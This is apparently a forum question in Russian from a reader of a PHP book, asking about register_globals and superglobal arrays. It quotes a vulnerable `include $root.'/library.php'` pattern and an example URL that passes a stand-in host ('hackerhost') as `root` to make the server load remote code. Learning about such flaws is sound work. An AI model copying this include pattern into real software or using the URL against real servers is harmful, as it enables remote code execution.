Читаю Котерова, достаточно хорошо рассказывается про программирование, а также про оптимизацию и уязвимости.

Дошел до примеров уязвимости.
Вот такой пример.

<?php
include $root."/library.php";
?>

значит если переменная $root не установлена, злоумышленник сможет запустить на сервере любой код

пример
http://example.com/script.php?root=http://hackerhost

Идет речь про глобальные переменные. Их использовать опасно и по умолчанию они отключены. Вопрос. А GET POST REQUEST это же глобальные массивы а в них же переменные. Их что не желательно использовать ?

И как тогда вид скрипта будет отличатся с включенными глобальными переменными и выключенными ?